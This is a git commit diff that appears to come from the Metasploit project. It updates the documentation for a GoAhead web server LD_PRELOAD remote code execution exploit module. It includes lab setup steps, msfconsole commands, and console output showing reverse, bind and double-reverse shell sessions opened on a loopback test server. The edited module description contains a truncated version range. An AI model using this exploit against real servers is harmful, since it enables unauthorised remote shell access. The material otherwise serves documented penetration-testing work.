Documentation update

hdm · hdm · commit eb696ee5cfdd · 2017-12-28T16:30:04.000-06:00
diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md
@@ -16,7 +16,7 @@ git checkout tags/v3.6.4 -q
 make > /dev/null
 cd test
 gcc ./cgitest.c -o cgi-bin/cgitest
-sudo ../build/linux-x64-default/bin/goahead
+../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
 ```
 
 ## Verification Steps
@@ -25,7 +25,7 @@ sudo ../build/linux-x64-default/bin/goahead
 
   1. Install the application
   2. Start msfconsole
-  3. Do: ```use exploit/linux/http/goahead_cgi_exec```
+  3. Do: ```use exploit/linux/http/goahead_ldpreload```
   4. Do: ```set rhost [ip]```
   5. Do: ```exploit```
   6. You should get a shell.
@@ -41,21 +41,76 @@ sudo ../build/linux-x64-default/bin/goahead
 ### GoAhead 3.6.4 on Ubuntu 16.04 x64
 
 ```
-[*] Processing goahead.rc for ERB directives.
-resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
-resource (goahead.rc)> set verbose true
-verbose => true
-resource (goahead.rc)> set rhost 127.1.1.1
-rhost => 127.1.1.1
-resource (goahead.rc)> check
-<TBD>
-resource (goahead.rc)> exploit
-[*] Started reverse TCP handler on 127.1.1.1:4444
-[*] Sending Exploit to /cgi-bin/cgitest
-[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
+
+msf> use exploit/linux/http/goahead_preload
+msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1
+msf exploit(goahead_ldpreload) > set RPORT 8080
+msf exploit(goahead_ldpreload) > check
+
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[+] 127.1.1.1:8080 The target is vulnerable.
+
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+exit
+
+msf exploit(goahead_ldpreload) > set TARGET 1
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[*] Started bind handler
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+exit
+
+msf exploit(goahead_ldpreload) > set TARGET 2
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP double handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo sNRXNjxWl7ic0uWw;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "sNRXNjxWl7ic0uWw\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+
+msf exploit(goahead_ldpreload) > set TARGET 4
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600
+
 uname -a
-Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 
-whoami
-root
 ```
diff --git a/modules/exploits/linux/http/goahead_ldpreload.rb b/modules/exploits/linux/http/goahead_ldpreload.rb
@@ -13,7 +13,7 @@ def initialize(info = {})
       'Name'           => 'GoAhead Web Server LD_PRELOAD Arbitrary Module Load',
       'Description'    => %q{
           This module triggers an arbitrary shared library load vulnerability
-        in GoAhead web server versions prior to 3.6.5 that have the CGI module
+        in GoAhead web server versions between 2.5 and that have the CGI module
         enabled.
       },
       'Author'         =>
